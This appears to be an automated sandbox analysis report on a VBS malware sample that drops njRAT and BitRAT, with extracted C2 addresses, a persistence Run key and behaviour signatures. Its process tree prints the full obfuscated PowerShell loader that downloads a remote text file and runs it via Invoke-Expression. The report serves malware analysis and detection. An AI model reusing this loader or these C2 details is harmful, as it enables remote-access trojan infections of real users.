Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
29-12-2023 21:01
Static task
static1
Behavioral task
behavioral1
Sample
03e4a5b246180743a15aabbe28f2acb5.vbs
Resource
win7-20231215-en
General
-
Target
03e4a5b246180743a15aabbe28f2acb5.vbs
-
Size
1KB
-
MD5
03e4a5b246180743a15aabbe28f2acb5
-
SHA1
36caf7a27c4eb6c30557737ea50b8e47e32e07a9
-
SHA256
03674af9c28f5702955756f95a9173954188deb1d4f14b0bc8f0457e9383d6db
-
SHA512
3cd8706b9105cd1a71d95142eb62df9f39601a7752648ce47583d1b8715f89c0d839e161730ef1d77becb7b9f0edae6ff353394046fa7e9901f9e06bbf291996
Malware Config
Extracted
https://ia601506.us.archive.org/27/items/bypass_202108/bypass.txt
Extracted
njrat
v4.0
HacKed
13.77.222.211:7827
Windows
-
reg_key
Windows
-
splitter
|-F-|
Extracted
bitrat
1.38
20.194.35.6:7904
-
communication_password
202cb962ac59075b964b07152d234b70
-
install_dir
Appdata
-
install_file
Google.exe
-
tor_process
tor
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 7 1940 powershell.exe 26 1940 powershell.exe 41 1940 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation WScript.exe -
resource yara_rule behavioral2/memory/3032-29-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-28-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-30-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-32-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-31-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-37-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-39-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-40-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-41-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-43-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-44-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-45-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-42-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-51-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-53-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-52-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-56-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-57-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-59-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/3032-60-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google = "C:\\Users\\Admin\\AppData\\Local\\Appdata\\Google.exe먀" aspnet_compiler.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google = "C:\\Users\\Admin\\AppData\\Local\\Appdata\\Google.exe" aspnet_compiler.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google = "C:\\Users\\Admin\\AppData\\Local\\Appdata\\Google.exe\uff00" aspnet_compiler.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3032 aspnet_compiler.exe 3032 aspnet_compiler.exe 3032 aspnet_compiler.exe 3032 aspnet_compiler.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1940 set thread context of 5168 1940 powershell.exe 98 PID 1940 set thread context of 3032 1940 powershell.exe 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1940 powershell.exe 1940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 1940 powershell.exe Token: SeShutdownPrivilege 3032 aspnet_compiler.exe Token: SeDebugPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe Token: 33 5168 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5168 aspnet_compiler.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3032 aspnet_compiler.exe 3032 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 4076 wrote to memory of 1940 4076 WScript.exe 88 PID 4076 wrote to memory of 1940 4076 WScript.exe 88 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 5168 1940 powershell.exe 98 PID 1940 wrote to memory of 3032 1940 powershell.exe 99 PID 1940 wrote to memory of 3032 1940 powershell.exe 99 PID 1940 wrote to memory of 3032 1940 powershell.exe 99 PID 1940 wrote to memory of 3032 1940 powershell.exe 99 PID 1940 wrote to memory of 3032 1940 powershell.exe 99 PID 1940 wrote to memory of 3032 1940 powershell.exe 99 PID 1940 wrote to memory of 3032 1940 powershell.exe 99
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03e4a5b246180743a15aabbe28f2acb5.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://ia601506.us.archive.org/27/items/bypass_202108/bypass.txt';$B ='ETH COINt.WTF COINlIOSNT'.RePlace('ETH COIN','nE').RepLace('TF COIN','EbC').RepLace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.RepLace('S COIN ','Wn').RepLace('SO','oaD').RepLace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.RepLace('os COIN','X(n`e').RepLace('BTC COIN','-Ob').RepLace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5168
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3032
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82